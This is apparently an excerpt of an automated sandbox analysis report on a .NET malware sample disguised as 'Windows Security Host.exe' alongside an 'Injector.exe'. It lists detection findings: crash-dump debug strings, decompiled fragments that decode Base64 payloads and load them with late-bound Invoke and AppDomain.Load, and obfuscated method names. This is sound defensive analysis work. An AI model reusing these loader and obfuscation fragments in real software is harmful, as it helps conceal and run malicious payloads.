                    Source: Binary string: System.Configuration.ni.pdb source: WERAD5E.tmp.dmp.23.dr
                    Source: Binary string: System.Drawing.pdbX`h source: WERAD5E.tmp.dmp.23.dr
                    Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WERAD5E.tmp.dmp.23.dr
                    Source: Binary string: System.Configuration.pdb source: WERAD5E.tmp.dmp.23.dr
                    Source: Binary string: System.Data.ni.pdb source: WERAD5E.tmp.dmp.23.dr
                    Source: Binary string: System.Data.ni.pdbRSDSC source: WERAD5E.tmp.dmp.23.dr
                    Source: Binary string: System.Drawing.ni.pdbRSDS source: WERAD5E.tmp.dmp.23.dr
                    Source: Binary string: System.Xml.pdbp+ source: WERAD5E.tmp.dmp.23.dr
                    Source: Binary string: System.Xml.pdb source: WERAD5E.tmp.dmp.23.dr
                    Source: Binary string: System.pdb source: BootstrapperV1.23.exe, 00000004.00000002.1603426413.000001EF96E0C000.00000004.00000800.00020000.00000000.sdmp, WERAD5E.tmp.dmp.23.dr
                    Source: Binary string: mscorlib.pdbh source: WERAD5E.tmp.dmp.23.dr
                    Source: Binary string: System.Xml.ni.pdbRSDS# source: WERAD5E.tmp.dmp.23.dr
                    Source: Binary string: System.Core.ni.pdb source: WERAD5E.tmp.dmp.23.dr
                    Source: Binary string: System.Numerics.ni.pdbRSDSautg source: WERAD5E.tmp.dmp.23.dr
                    Source: Binary string: System.Numerics.ni.pdb source: WERAD5E.tmp.dmp.23.dr
                    Source: Binary string: System.Data.pdbH source: WERAD5E.tmp.dmp.23.dr
                    Source: Binary string: System.Windows.Forms.pdb source: WERAD5E.tmp.dmp.23.dr
                    Source: Binary string: mscorlib.pdb source: WERAD5E.tmp.dmp.23.dr
                    Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: WERAD5E.tmp.dmp.23.dr
                    Source: Binary string: System.Drawing.pdb source: WERAD5E.tmp.dmp.23.dr
                    Source: Binary string: mscorlib.ni.pdb source: WERAD5E.tmp.dmp.23.dr
                    Source: Binary string: System.Core.pdb source: WERAD5E.tmp.dmp.23.dr
                    Source: Binary string: System.Runtime.Serialization.pdb source: WERAD5E.tmp.dmp.23.dr
                    Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WERAD5E.tmp.dmp.23.dr
                    Source: Binary string: System.Numerics.pdb source: WERAD5E.tmp.dmp.23.dr
                    Source: Binary string: System.ni.pdb source: WERAD5E.tmp.dmp.23.dr
                    Source: Binary string: System.Core.ni.pdbRSDS source: WERAD5E.tmp.dmp.23.dr

                    Data Obfuscation

                    barindex
                    .NET source code contains method to dynamically call methods (often used by packers)
                    Source: Windows Security Host.exe.0.dr, UUO1DwCJT8TD0Bjf4P22VxJja44FqJSKtOfaVbm2PiQ1EHP4nk7PUJy.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{ZtOQxII8taYVMyhy3X9kwlrA9X9tmCjo7UPt5IEWs7WYVJJoWwke81L.OuTzUhPYtQqV287zCSf0oVRih6gVPh8dMzqj2YPHCCs30iBp6blvsuW,ZtOQxII8taYVMyhy3X9kwlrA9X9tmCjo7UPt5IEWs7WYVJJoWwke81L.upIt1fwS9dmgmXHFhU7Ktmq2wkUFxs4SI1JyhpSVjAOEZcBeuqRaA5y,ZtOQxII8taYVMyhy3X9kwlrA9X9tmCjo7UPt5IEWs7WYVJJoWwke81L.KTnoemogtnEz2jQ7erkMbtpLWeNUmE0SXg06ljkJTxmOqFPjq2H9MFs,ZtOQxII8taYVMyhy3X9kwlrA9X9tmCjo7UPt5IEWs7WYVJJoWwke81L.lHAQl6jDawA7sDZRqxByd8jBL8pdvhp0haGqY8Ts1FdeyfyO0gQSMt7,Qei4clBmc3YtaKxgwyIgrvlrfhh2HULZdoOaNTOg.hOKIC7FK9Rajll6qRjm4KBCtWlHS4LBvgvoxxUIi()}}, (string[])null, (Type[])null, (bool[])null, true)
                    Source: Windows Security Host.exe.0.dr, UUO1DwCJT8TD0Bjf4P22VxJja44FqJSKtOfaVbm2PiQ1EHP4nk7PUJy.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{VMTTl7RVt1OdSxAUEJ6qsFdPzuSPsiOgvudMUIz5[2],Qei4clBmc3YtaKxgwyIgrvlrfhh2HULZdoOaNTOg.UvFO9NG9AJ96qUxZ3W7wxprFYsilLQNz5X0oXOTV(Convert.FromBase64String(VMTTl7RVt1OdSxAUEJ6qsFdPzuSPsiOgvudMUIz5[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                    Source: 0.2.8Hd0ZExgJz.exe.26f5df0.1.raw.unpack, UUO1DwCJT8TD0Bjf4P22VxJja44FqJSKtOfaVbm2PiQ1EHP4nk7PUJy.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{ZtOQxII8taYVMyhy3X9kwlrA9X9tmCjo7UPt5IEWs7WYVJJoWwke81L.OuTzUhPYtQqV287zCSf0oVRih6gVPh8dMzqj2YPHCCs30iBp6blvsuW,ZtOQxII8taYVMyhy3X9kwlrA9X9tmCjo7UPt5IEWs7WYVJJoWwke81L.upIt1fwS9dmgmXHFhU7Ktmq2wkUFxs4SI1JyhpSVjAOEZcBeuqRaA5y,ZtOQxII8taYVMyhy3X9kwlrA9X9tmCjo7UPt5IEWs7WYVJJoWwke81L.KTnoemogtnEz2jQ7erkMbtpLWeNUmE0SXg06ljkJTxmOqFPjq2H9MFs,ZtOQxII8taYVMyhy3X9kwlrA9X9tmCjo7UPt5IEWs7WYVJJoWwke81L.lHAQl6jDawA7sDZRqxByd8jBL8pdvhp0haGqY8Ts1FdeyfyO0gQSMt7,Qei4clBmc3YtaKxgwyIgrvlrfhh2HULZdoOaNTOg.hOKIC7FK9Rajll6qRjm4KBCtWlHS4LBvgvoxxUIi()}}, (string[])null, (Type[])null, (bool[])null, true)
                    Source: 0.2.8Hd0ZExgJz.exe.26f5df0.1.raw.unpack, UUO1DwCJT8TD0Bjf4P22VxJja44FqJSKtOfaVbm2PiQ1EHP4nk7PUJy.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{VMTTl7RVt1OdSxAUEJ6qsFdPzuSPsiOgvudMUIz5[2],Qei4clBmc3YtaKxgwyIgrvlrfhh2HULZdoOaNTOg.UvFO9NG9AJ96qUxZ3W7wxprFYsilLQNz5X0oXOTV(Convert.FromBase64String(VMTTl7RVt1OdSxAUEJ6qsFdPzuSPsiOgvudMUIz5[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                    Source: Windows Security Host.exe.3.dr, UUO1DwCJT8TD0Bjf4P22VxJja44FqJSKtOfaVbm2PiQ1EHP4nk7PUJy.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{ZtOQxII8taYVMyhy3X9kwlrA9X9tmCjo7UPt5IEWs7WYVJJoWwke81L.OuTzUhPYtQqV287zCSf0oVRih6gVPh8dMzqj2YPHCCs30iBp6blvsuW,ZtOQxII8taYVMyhy3X9kwlrA9X9tmCjo7UPt5IEWs7WYVJJoWwke81L.upIt1fwS9dmgmXHFhU7Ktmq2wkUFxs4SI1JyhpSVjAOEZcBeuqRaA5y,ZtOQxII8taYVMyhy3X9kwlrA9X9tmCjo7UPt5IEWs7WYVJJoWwke81L.KTnoemogtnEz2jQ7erkMbtpLWeNUmE0SXg06ljkJTxmOqFPjq2H9MFs,ZtOQxII8taYVMyhy3X9kwlrA9X9tmCjo7UPt5IEWs7WYVJJoWwke81L.lHAQl6jDawA7sDZRqxByd8jBL8pdvhp0haGqY8Ts1FdeyfyO0gQSMt7,Qei4clBmc3YtaKxgwyIgrvlrfhh2HULZdoOaNTOg.hOKIC7FK9Rajll6qRjm4KBCtWlHS4LBvgvoxxUIi()}}, (string[])null, (Type[])null, (bool[])null, true)
                    Source: Windows Security Host.exe.3.dr, UUO1DwCJT8TD0Bjf4P22VxJja44FqJSKtOfaVbm2PiQ1EHP4nk7PUJy.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{VMTTl7RVt1OdSxAUEJ6qsFdPzuSPsiOgvudMUIz5[2],Qei4clBmc3YtaKxgwyIgrvlrfhh2HULZdoOaNTOg.UvFO9NG9AJ96qUxZ3W7wxprFYsilLQNz5X0oXOTV(Convert.FromBase64String(VMTTl7RVt1OdSxAUEJ6qsFdPzuSPsiOgvudMUIz5[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                    .NET source code contains potential unpacker
                    Source: Windows Security Host.exe.0.dr, UUO1DwCJT8TD0Bjf4P22VxJja44FqJSKtOfaVbm2PiQ1EHP4nk7PUJy.cs.Net Code: U0Gv4nHYZqCA7eR70Vg6BjcM2X9skZ7l4GfQZI36T7V7aENt5AQ1hjS System.AppDomain.Load(byte[])
                    Source: Windows Security Host.exe.0.dr, UUO1DwCJT8TD0Bjf4P22VxJja44FqJSKtOfaVbm2PiQ1EHP4nk7PUJy.cs.Net Code: UbC6S8BZSFB6tNxgzNPrP0phxzq5fnd2qtOeiFu3 System.AppDomain.Load(byte[])
                    Source: Windows Security Host.exe.0.dr, UUO1DwCJT8TD0Bjf4P22VxJja44FqJSKtOfaVbm2PiQ1EHP4nk7PUJy.cs.Net Code: UbC6S8BZSFB6tNxgzNPrP0phxzq5fnd2qtOeiFu3
                    Source: 0.2.8Hd0ZExgJz.exe.26f5df0.1.raw.unpack, UUO1DwCJT8TD0Bjf4P22VxJja44FqJSKtOfaVbm2PiQ1EHP4nk7PUJy.cs.Net Code: U0Gv4nHYZqCA7eR70Vg6BjcM2X9skZ7l4GfQZI36T7V7aENt5AQ1hjS System.AppDomain.Load(byte[])
                    Source: 0.2.8Hd0ZExgJz.exe.26f5df0.1.raw.unpack, UUO1DwCJT8TD0Bjf4P22VxJja44FqJSKtOfaVbm2PiQ1EHP4nk7PUJy.cs.Net Code: UbC6S8BZSFB6tNxgzNPrP0phxzq5fnd2qtOeiFu3 System.AppDomain.Load(byte[])
                    Source: 0.2.8Hd0ZExgJz.exe.26f5df0.1.raw.unpack, UUO1DwCJT8TD0Bjf4P22VxJja44FqJSKtOfaVbm2PiQ1EHP4nk7PUJy.cs.Net Code: UbC6S8BZSFB6tNxgzNPrP0phxzq5fnd2qtOeiFu3
                    Source: Windows Security Host.exe.3.dr, UUO1DwCJT8TD0Bjf4P22VxJja44FqJSKtOfaVbm2PiQ1EHP4nk7PUJy.cs.Net Code: U0Gv4nHYZqCA7eR70Vg6BjcM2X9skZ7l4GfQZI36T7V7aENt5AQ1hjS System.AppDomain.Load(byte[])
                    Source: Windows Security Host.exe.3.dr, UUO1DwCJT8TD0Bjf4P22VxJja44FqJSKtOfaVbm2PiQ1EHP4nk7PUJy.cs.Net Code: UbC6S8BZSFB6tNxgzNPrP0phxzq5fnd2qtOeiFu3 System.AppDomain.Load(byte[])
                    Source: Windows Security Host.exe.3.dr, UUO1DwCJT8TD0Bjf4P22VxJja44FqJSKtOfaVbm2PiQ1EHP4nk7PUJy.cs.Net Code: UbC6S8BZSFB6tNxgzNPrP0phxzq5fnd2qtOeiFu3
                    Source: Injector.exe.0.drStatic PE information: 0x9C61056C [Wed Feb 19 18:54:36 2053 UTC]
                    Source: C:\Users\user\Desktop\8Hd0ZExgJz.exeCode function: 0_2_00007FFAAC5B00BD pushad ; iretd 0_2_00007FFAAC5B00C1
                    Source: C:\Users\user\AppData\Local\Temp\Injector.exeCode function: 2_2_00007FFAAC5800BD pushad ; iretd 2_2_00007FFAAC5800C1
                    Source: C:\Users\user\AppData\Local\Temp\Windows Security Host.exeCode function: 3_2_00007FFAAC5A593C push esp; retf 3_2_00007FFAAC5A59D9
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeCode function: 4_2_00007FFAAC5AD668 push ss; retf 4_2_00007FFAAC5AD837
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeCode function: 4_2_00007FFAAC5900BD pushad ; iretd 4_2_00007FFAAC5900C1
                    Source: C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeCode function: 4_2_00007FFAAC5AA272 push ebx; retf 4_2_00007FFAAC5AA282
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_00007FFAAC46D2A5 pushad ; iretd 16_2_00007FFAAC46D2A6
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_00007FFAAC652316 push 8B485F94h; iretd 16_2_00007FFAAC65231B
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_00007FFAAC656053 pushad ; iretd 16_2_00007FFAAC6561B1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 24_2_00007FFAAC46D2A5 pushad ; iretd 24_2_00007FFAAC46D2A6
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 24_2_00007FFAAC5811DD push E95C6805h; ret 24_2_00007FFAAC581239
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 24_2_00007FFAAC652316 push 8B485F94h; iretd 24_2_00007FFAAC65231B
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 28_2_00007FFAAC46D2A5 pushad ; iretd 28_2_00007FFAAC46D2A6
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 28_2_00007FFAAC652316 push 8B485F94h; iretd 28_2_00007FFAAC65231B
                    Source: 8Hd0ZExgJz.exeStatic PE information: section name: .text entropy: 7.99421164591081
                    Source: Windows Security Host.exe.0.dr, Hack4BQFI25fjaBNRAgg7o1cJuSJYApNkWzwGV1K.csHigh entropy of concatenated method names: 'fUaHi915Q2SCY4vatUCg5JS73gHa4SRSgz9a4Iph', 'ym11NVLutZRyymekaMkNX6RXHRAEwMZaVle9qIEr', 'DsGK73xG4SufqS3g4FJRUb8ujF0JLOI4Dy82fG4x', 'mqs8mPuBqHXiB7zQHUi2mNoZy8vJqGHkUT0CmSHNi2NnvMRzxssrCqjm8VaeO5q7r0msTw6UTlXCCGAINkhGOAqopO', 'YEAij0svkgkGFvxSR8j0NLfx0o39uOHnoEwzTHav9LLlRLUr0unxNElOo5zVZKEnm7LMx08owypsnt4osoh1hi2aeO', 'IhB9suP04ABwxnKjapODuJlTZGintCvMvus8eEUpKsNPBrvoRVqMYkdLBqIdo8sufoIlqif6DPalwIalps9higKuqL', 'rRRL1Tzs76hOBNZZE9J8OyN191KlX2Zua4qHcRurl3rYxw9qQj3dQJVLLOCfHqdJIHSyBgsDUoyFcaeOFrVAdhTcPa', '_2krxW3K1nVwn1psV5pxeR5rOzAM1FYYQ8WYOgznQ3vGMf8pLAxDlTCP8lMlm2BELLsWbUsRgtQxHQngLOtPrLZegt1', 'He0a2h4bt1MEb6K6iOiOpT4n4iGzhSJOYP9R8klgc5LsFcDNY4tJyT6Jsj6nbUaMNLollDYIBTB7dv6e7PIKIkM5fe', 'rwmklMnQjcQRsAVWs6gm4avIaROxOY0jJbUqWJlRuMET7qNlviyrNJFUnTL1zXchptI6S1qBCuU91jVZWVcdL1kUVw'
                    Source: Windows Security Host.exe.0.dr, ZtOQxII8taYVMyhy3X9kwlrA9X9tmCjo7UPt5IEWs7WYVJJoWwke81L.csHigh entropy of concatenated method names: 'MN8ERM3Z7FBRl3Zg8JQhw3aqRsEPhqVkQNTiletuPm9KE9HuFTUNm8ftCO8OB3ufO7FEUZnJ', 'o36wxU1HlWqf5SgBFVDXAxjVdkkWAvnnFpE2ycR3WIkH0GVFAGV3YGURabPwFHo80TIQhGqK', 'PoCuA8O3oyIuHQMZKDDvNEyGf7s2iu8bvCMn6F9NvnAIAYjgvZ2E5tgMknmEqueR4vcD5w0k', 'f2ee6ydpQQMb1mqxGTd9yqXKOhq7lwXE6csu2Ly07TH43DhnUryiDmV2J9PlJdfNxN7JAjbR'
                    Source: Windows Security Host.exe.0.dr, hwmtv4f3DiHFPVZouaTyX8hlf0YqgEyb8O6Ad4mWdDWf1F52iddDM7M.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'XRSbeAtfgYh7Kxptedlsp8xqd7xGLTHWVMdpVwoC1pBfTNxGkjcdApxcOkNqSvCf0ZVjXcW4', '_4OxmFCSdwAhhRFUy08Hfrto0pBgjFdzmrMnOcS1EtaRsrUWzWVzeWb8Sbf0Rteu0mY2ckHiT', '_2VHg99hYV8ztmyyHua3f3n1NHwtunTTvPf5tQtiijBKEyDfnRFevJg1NyhW12dkwY0SAEs1H', 'hNl93BgmIFdzfAPlUMFzRiK1L0ZFMkdjwYLlBAd8Bl3eOfkqDuoYeIAClwUy3EajsREUqzXx'
                    Source: Windows Security Host.exe.0.dr, UUO1DwCJT8TD0Bjf4P22VxJja44FqJSKtOfaVbm2PiQ1EHP4nk7PUJy.csHigh entropy of concatenated method names: 'Rm8FpaieZMoW7z264rwb8bz2H4c6aHp7Zm9YjgtPENyjw36t3xrA1TG', 'U0Gv4nHYZqCA7eR70Vg6BjcM2X9skZ7l4GfQZI36T7V7aENt5AQ1hjS', 'ACAK89aZu2VzBZzFwLe5rT07V13pTwQX1KvSun2hM7yPr4VggBMTLHW', 'r2Frn0E0r7vvmo5i6oVO7doevY9d2pMj5XxfKdJPBB87BDFwDCpH3HB', 'DLhjX4mF0CaPUxa2ro80Inw17SJhzceCWBzhzO0XvNPOnlBEAXjNxbF', 'W5YqEwH4kesxhRqTE8cNqHwkdORdaiyXAGJpGFKqyrlINzkwUs4j7oC', 'Wz7IZYizEXhCHMcepDfJNxEUHgICm0GABfdMcPCVBKUH1I6omKhG6wb', 'XtDzhljwkL9BW8rl2Twvx5I3CNX2p2q5XHUZSmKXVC9gsPyoDUnjPjD', 'zw3YUhNglyha13YdAfNFYNIlLApZXat23upzIHyaJ66NXiIaRSfc7tn', 'OA2Y2mutcuZCMyuD3JXI0NbB0SqNdFEr2zmRRkam'
                    Source: Windows Security Host.exe.0.dr, Qei4clBmc3YtaKxgwyIgrvlrfhh2HULZdoOaNTOg.csHigh entropy of concatenated method names: 'nMqyhawtoA24xIuxIlptmwHWKsfTnFGLPZYUqdN9', 'dkKJ2Ath9TgOHMiUghO6R4hPmK8Xw5fmDoyNV5P7', 'BPpR7Ihy5fuOMuoqs7TQjosfgUVIZ22jYpx9bPHG', 'LXUSQL8p3GARl1t1DUhLmf0RYQlxGggBkC5PbzpP', 'mibSVfQ5vcknf04M1C1usZuxFTDSyiZfp2N24mpl', '_4oD51RdiUFYtMo1halOtlbwbXPb6uBBoeS5ypGsR', 'rpl1WfPD4F66gyyTij9oLXwcuDh7jputgu2gpVmI', 'vKUNX0ELXQW2QGnW9wpnTvdnaS9fHwA0A6zv7Svf', 'ib2jtjbB3jlpY3YH7Tg8jBzi0CnlnQlDfHHaUDeO', 'JURZnwyOMeCJOjZP1CcqQ4r4zObCsDNqiKp4oYEB'
                    Source: Windows Security Host.exe.0.dr, pCU0BaPayj3nEJTRG1YX7L1Jb5gOxsx4ZxeKDKGJ.csHigh entropy of concatenated method names: 'gwdBiDGrsqra4xJDEVRAAHk8ixWQMtISqaOJ0eCA', 'o3HWCRkvMkpvSZB20yl1pF7FU8wPRHVFnGESfuPNUY9JXs6BXOmzmhy9s', 'qMmdryJ92VOoGpffxkNicZMZIa7I4Itnx1MnCozVhSTnHOlt9MXB60dCL', 'Pz6T4a3ONk9BHptTHm0ebvVVwUVX51tvvdrSLqRUg5nfFo0e3KJGdVTEQ', 'X743L84zyetr9mkRrCNo6pI1vOOCPya9yVGOKeEwJPc9RaOQskAzT0mCZ'
                    Source: Windows Security Host.exe.0.dr, DmCt5QxmGTm528ilqbeA2ahQPXHLzWVGTxW2HeINBuHBW3oaxRjxQ71.csHigh entropy of concatenated method names: 'TPKhuDz4s1rf8i1hwqc2QMGg2UsV554vOm7i1AZ3KylU9pSjoUm05dL', 'cRhOtQfLozT80pWem0pirZy7pbnycZ3QwlB4JpKR1vCz51OSpkaOaTW', 'AJaac4JmemH2rsVa7lRrDmlnr2JC8lkgHeZGLSuU3cBilefGFbLeyOm', 'V7pa2Sc0gIB6xlLp8hlR185xs6zHDAgeTucJr9PGvASsfB0UEey6Oq6', 'Yr9oFPBU6ubOrG5zzpzNARhs7OSfaSkoOG6l3NRsMK8HYxu8S3QtIUB', 'ZUZzZaytAPji40S1dtCDVgZ0LcSJ0j27gVA1ZGtttHycnaf3zFzt2h7', 'GUnAuukad8VQsTQYfnD6x6Fpwvm7mkL8WPXhduRX348d0ZpldeYzDQ5', '_7c85FFD3oacggbQwxP2IM8lsbcjqrI9rjMGlWFrFpqhX72fwmFR8lBj', 'j4MedkzxJYMH1i3xVxph16gRvdEfFMyqJ3M4sqCgCg7Og7sp6f8wJc1', 'irUSf4pIDk7ubW7NNL4w6RiLKDzrDHEtkBSnsaggCZFS8x4uRM5dBye'
                    Source: Windows Security Host.exe.0.dr, pX49WTWreP6h38vcWNF06rYOS0B7DTfD16dfY5IqI76SjlXgINh7OKF.csHigh entropy of concatenated method names: 'UWl6q1tllqEQvYndtdinpjTk8r0RWn1697idwuzTDx6BhexflmYJ2dU', 'l3UqPE30ijk1rA7iiMlD6uHMWW44RKAn0GsYYXfoonm2RKO0N96BFbo', 'rJCMhP4h7Og0wKAV85o7J39PyMu66yeQtbJb5iPLftfXOFJloVQxw6H', 'ox1KIzQ8N3KwianZxJ388IvIKMZKyRdf5Rq2Axm7YHgsn5XIMVK2H1O', 'oz94QYmoZ1n9yrPPxv4DH4biNmUSZwT51KY7Cwzg7EOTtZtzFSEABUW', 'tNoOd4KzCCvrj98IsqK5cgzZEvh7aF66nLyJpo32UhQqHuJso4KE3GGCWhCmI130ZF5wlTS4', 'DMiNRlVGn3v8eBi2x05rnJ6NPDNYXx1gaX7XvR4RDwQbWac9JTNyzMBGGTuieEbjfS0cx8Zh', 'huqcnufBpqYs9kQ4UnseK72wuRhbEmSCXYwQtqwjN4CFhD4ZqfFUmPTk8wzYP3MmBEFFop9K', '_2DYmVyFxTcStEhswOvIoIAImlrjVqo4OHwf7uXdTlwY45VVg8urKvP0QAjLbjlG3FhgLPyC4', 'bJ49487JZH0h3KuPyE7nCxT3wiTZxYEVNGGjelqZDWkJCXgs5nCw64cNFunmDuWInLRxxhFA'
                    Source: Windows Security Host.exe.0.dr, mzsbakNglaER3LKxVTydaTROCw6IGp8wfTPLVmdZ.csHigh entropy of concatenated method names: 'Q1lY74VbQ4HPiyjyEy8FkRqehrkKk9b02JKt5mfN', 'bjuyZK2t7i6FCrci4IwFKhprso6J4s1zinnbj9mYeCcfkTnSW6lL9OBJR', '_1BVyv1KlKzatjWbnYHz6oSSHvfDumsLHrOeA4wdiX5kAoOpa6tiIk0f3Q', 'cc4awgwWvVPvUALiJ7wJntzSlbcGWn3JeD1U77MUVERXgdn5mZgfNMSYP', 'vdqcUf0ULR2Ql9ijYKvl9Dqxxn62pYGqiXiTnNwqv2MP5cQGZugtxBNyP'
                    Source: Windows Security Host.exe.0.dr, GWYxCOLqDOSWCLC3OG7xybolFnfHf1CzbiM9fHDC.csHigh entropy of concatenated method names: '_2wMZuA6jmIytnkRIwWH0lqZw7LIBE9V3QHKp7Mke', 'bd8gO9tsieaFCGyalOw8vq0qhCXtNoHnshRbKDNQ', 'z7AzFkomS0LUj194z315YdBWwnjNzXoCAWSsrKfb', 'DIljgHyfeWUsj6TlEPYK1rADoYqAPfp1ZiBx9HOk', '_6mWR3tOHUygNZihtjS3S3Y0AkQygbkfGmos0PN2c', 'og8OXj7OIhc5FtcOPCJPieYQH4Fg18CiEb7Qgs5s', 'P5CEoPF5i0mWht3ttKY5FZaUtf6YC5f8okAqJrl3', 'DPMnVeYYzbsm4w0rOUrg2fiB5DAumi1Yq4ZnU0Tw', 'l16dhBsaRlPGiO5OYXn5CCcZWDk9C5T1yX4StPCZ', 'CClexRkZSfofMTN5sD2jl4C80ZQ4BvQ31hs5CROF'
                    Source: Windows Security Host.exe.0.dr, kGWyFLzwGo1x3FHf7gkFoqhjADWohiyUpAlG1Wdv.csHigh entropy of concatenated method names: 'eKDrezHiHFH4nDVWsJUkqDakojPPfGvRSIeoCGAu', 'RGpeD9ZyFVNo3DGQc0iu6XnZ5qm2hqJguEsGnRrU', 'ZrvakkhboWtWhTPIKnioCkXAWPPppxTdt5LmV8Xw', 'FeKYJSRu8xpJDE6vqKDJLUnDs7LaQvo0IL8LKXOb', 'VHn7mZvZGguiJQgUtk3ERNVEKjevviaOJO9fiLBuVsZihRyDOUoh1T4Fr', 'PzIi4HCZWxkpY13cUeNCFhCwrlFPJFIA3PgzUe8KICDXUqU6LkXadCG3Q', 'IbdnY17WXJp3tISDz1bmw18R2nhAY4N01GyYv75arjSliz7OV64HohZIb', '_5BUa1nZHKmRvfOV6AJM1UamikedsjY8MJGGaeBkcNpM0nGugS035IU2IL', 's1PVejoGdKHkRMGHi2Q9ERoME74Op1LuTFSI3eP8ZgIob5ccdW7TxrQrn', 'KLbXMDx9NTK4Z0wyHTmJGa45lihRyIJsY02l2JocyAOwDWifSoNpamqkT'
                    Source: 0.2.8Hd0ZExgJz.exe.26f5df0.1.raw.unpack, Hack4BQFI25fjaBNRAgg7o1cJuSJYApNkWzwGV1K.csHigh entropy of concatenated method names: 'fUaHi915Q2SCY4vatUCg5JS73gHa4SRSgz9a4Iph', 'ym11NVLutZRyymekaMkNX6RXHRAEwMZaVle9qIEr', 'DsGK73xG4SufqS3g4FJRUb8ujF0JLOI4Dy82fG4x', 'mqs8mPuBqHXiB7zQHUi2mNoZy8vJqGHkUT0CmSHNi2NnvMRzxssrCqjm8VaeO5q7r0msTw6UTlXCCGAINkhGOAqopO', 'YEAij0svkgkGFvxSR8j0NLfx0o39uOHnoEwzTHav9LLlRLUr0unxNElOo5zVZKEnm7LMx08owypsnt4osoh1hi2aeO', 'IhB9suP04ABwxnKjapODuJlTZGintCvMvus8eEUpKsNPBrvoRVqMYkdLBqIdo8sufoIlqif6DPalwIalps9higKuqL', 'rRRL1Tzs76hOBNZZE9J8OyN191KlX2Zua4qHcRurl3rYxw9qQj3dQJVLLOCfHqdJIHSyBgsDUoyFcaeOFrVAdhTcPa', '_2krxW3K1nVwn1psV5pxeR5rOzAM1FYYQ8WYOgznQ3vGMf8pLAxDlTCP8lMlm2BELLsWbUsRgtQxHQngLOtPrLZegt1', 'He0a2h4bt1MEb6K6iOiOpT4n4iGzhSJOYP9R8klgc5LsFcDNY4tJyT6Jsj6nbUaMNLollDYIBTB7dv6e7PIKIkM5fe', 'rwmklMnQjcQRsAVWs6gm4avIaROxOY0jJbUqWJlRuMET7qNlviyrNJFUnTL1zXchptI6S1qBCuU91jVZWVcdL1kUVw'
                    Source: 0.2.8Hd0ZExgJz.exe.26f5df0.1.raw.unpack, ZtOQxII8taYVMyhy3X9kwlrA9X9tmCjo7UPt5IEWs7WYVJJoWwke81L.csHigh entropy of concatenated method names: 'MN8ERM3Z7FBRl3Zg8JQhw3aqRsEPhqVkQNTiletuPm9KE9HuFTUNm8ftCO8OB3ufO7FEUZnJ', 'o36wxU1HlWqf5SgBFVDXAxjVdkkWAvnnFpE2ycR3WIkH0GVFAGV3YGURabPwFHo80TIQhGqK', 'PoCuA8O3oyIuHQMZKDDvNEyGf7s2iu8bvCMn6F9NvnAIAYjgvZ2E5tgMknmEqueR4vcD5w0k', 'f2ee6ydpQQMb1mqxGTd9yqXKOhq7lwXE6csu2Ly07TH43DhnUryiDmV2J9PlJdfNxN7JAjbR'
                    Source: 0.2.8Hd0ZExgJz.exe.26f5df0.1.raw.unpack, hwmtv4f3DiHFPVZouaTyX8hlf0YqgEyb8O6Ad4mWdDWf1F52iddDM7M.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'XRSbeAtfgYh7Kxptedlsp8xqd7xGLTHWVMdpVwoC1pBfTNxGkjcdApxcOkNqSvCf0ZVjXcW4', '_4OxmFCSdwAhhRFUy08Hfrto0pBgjFdzmrMnOcS1EtaRsrUWzWVzeWb8Sbf0Rteu0mY2ckHiT', '_2VHg99hYV8ztmyyHua3f3n1NHwtunTTvPf5tQtiijBKEyDfnRFevJg1NyhW12dkwY0SAEs1H', 'hNl93BgmIFdzfAPlUMFzRiK1L0ZFMkdjwYLlBAd8Bl3eOfkqDuoYeIAClwUy3EajsREUqzXx'
                    Source: 0.2.8Hd0ZExgJz.exe.26f5df0.1.raw.unpack, UUO1DwCJT8TD0Bjf4P22VxJja44FqJSKtOfaVbm2PiQ1EHP4nk7PUJy.csHigh entropy of concatenated method names: 'Rm8FpaieZMoW7z264rwb8bz2H4c6aHp7Zm9YjgtPENyjw36t3xrA1TG', 'U0Gv4nHYZqCA7eR70Vg6BjcM2X9skZ7l4GfQZI36T7V7aENt5AQ1hjS', 'ACAK89aZu2VzBZzFwLe5rT07V13pTwQX1KvSun2hM7yPr4VggBMTLHW', 'r2Frn0E0r7vvmo5i6oVO7doevY9d2pMj5XxfKdJPBB87BDFwDCpH3HB', 'DLhjX4mF0CaPUxa2ro80Inw17SJhzceCWBzhzO0XvNPOnlBEAXjNxbF', 'W5YqEwH4kesxhRqTE8cNqHwkdORdaiyXAGJpGFKqyrlINzkwUs4j7oC', 'Wz7IZYizEXhCHMcepDfJNxEUHgICm0GABfdMcPCVBKUH1I6omKhG6wb', 'XtDzhljwkL9BW8rl2Twvx5I3CNX2p2q5XHUZSmKXVC9gsPyoDUnjPjD', 'zw3YUhNglyha13YdAfNFYNIlLApZXat23upzIHyaJ66NXiIaRSfc7tn', 